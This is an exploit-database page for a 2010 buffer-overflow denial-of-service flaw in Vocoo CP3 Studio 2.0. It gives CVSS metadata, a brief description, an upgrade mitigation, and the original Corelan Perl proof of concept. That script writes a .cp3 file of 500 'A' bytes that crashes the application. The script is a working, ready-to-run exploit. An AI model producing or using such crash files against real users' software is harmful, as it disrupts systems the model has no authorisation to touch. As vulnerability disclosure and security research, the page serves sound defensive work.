header-logo
Suggest Exploit
vendor:
CP3 Studio
by:
chap0
7,5
CVSS
HIGH
Denial of Service
119
CWE
Product Name: CP3 Studio
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: YES
Related CWE: N/A
CPE: a:vocooo:cp3_studio
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3 En
2010

CP3 Studio PC Ver. Dos

A denial of service vulnerability exists in Vocoo CP3 Studio 2.0, due to a buffer overflow when processing a specially crafted .cp3 file. An attacker can exploit this vulnerability to cause a denial of service condition. This vulnerability is due to a lack of proper boundary checks when processing the .cp3 file. An attacker can exploit this vulnerability by crafting a .cp3 file with an overly long string and sending it to the vulnerable application. This will cause the application to crash, resulting in a denial of service condition.

Mitigation:

Upgrade to the latest version of Vocoo CP3 Studio.
Source

Exploit-DB raw data:

# Exploit Title : CP3 Studio PC Ver. Dos
# Date          : June 12, 2010
# Author        : chap0 - [www.seek-truth.net] 
# Link 		: http://www.vocooo.com
# Version       : 2.0
# Tested on     : Windows XP SP3 En 
# Greetz to     : Corelan Security Team
# The Crew	: http://www.corelan.be:8800/index.php/security/corelan-team-members/
# Advisory	: http://www.corelan.be:8800/advisories.php?id=CORELAN-10-051
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.  
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
# Code :
#!/usr/bin/perl
print "|------------------------------------------------------------------|\n";
print "|                         __               __                      |\n";
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |\n";
print "|  / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\   / __/ _ \\/ __ `/ __ `__ \\ |\n";
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |\n";
print "| \\___/\\____/_/   \\___/_/\\__,_/_/ /_/   \\__/\\___/\\__,_/_/ /_/ /_/  |\n";
print "|                                                                  |\n";
print "|                                       http://www.corelan.be:8800 |\n";
print "|                                                                  |\n";
print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
print "[+] Vocoo CP3 Studio 2.0 Dos. . .\n\n";
sleep(2);
my $play = "tunes.cp3";

my $buffer = "\x41" x 500;

open(FILE,">$play");
print FILE $buffer;
close(FILE);

print "[+] Music Provided by chap0 visit www.corelan.be:8800\n";